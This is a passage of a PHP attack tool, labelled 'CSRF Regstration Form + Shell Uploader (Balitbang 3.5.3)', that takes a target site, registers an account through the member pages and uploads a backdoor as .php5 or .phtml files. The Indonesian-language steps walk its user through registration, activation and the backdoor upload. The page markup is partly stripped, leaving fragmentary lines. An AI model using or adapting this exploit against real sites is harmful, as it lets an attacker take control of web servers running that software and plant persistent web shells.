=0)and($code<100)) { $t .=dechex(strlen($str)+$code)."g"; $str=strrev($str); for($i=0;$i<=strlen($str)-1;$i++) { $t .=dechex(ord(substr($str,$i,1))+$code); } } return $t; } function unhex($str='',$code='') { $all=explode("g",$str); $head=hexdec($all[0])-$code; $content=$all[1]; if($head==(strlen($content)/2)) { for($i=0;$i<=$head-1;$i++) { $t .=chr(hexdec(substr($content,$i*2,2))-$code); } $t =strrev($t); } return $t; } $target = $_GET['target']; $ur_target = $target."/member/membersave.php"; $ur_upload = $target."/functions/simmateri.php"; $captcha = $target."/functions/captcha/captcha.php"; $ur_login = $target."/member/ajax_login.php"; $userx = $_GET['n']; $passx = $_GET['p']; if(isset($_POST['next'])){ $tar = $_POST['tar']; $n = $_POST['n']; $p = $_POST['p']; header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar.""); } echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)
"; ?>
target :
username :
password :

$userx
"; echo "password : $passx
"; ?>
» capture target...
"; echo "Langkah selanjutnya:
1. Setelah registrasi berhasil, untuk aktivasi/verifikasi!.
» capture target...

2. Langkah terakhir, Upload backdoornya
"; } else if(isset($_GET['load']) && $_GET['load'] == "upload"){ ?>
Jika tidak bisa login dihalaman member,
File :
» capture target...
hasil upload (.php5): " target="_blank">
hasil upload (.phtml): " target="_blank">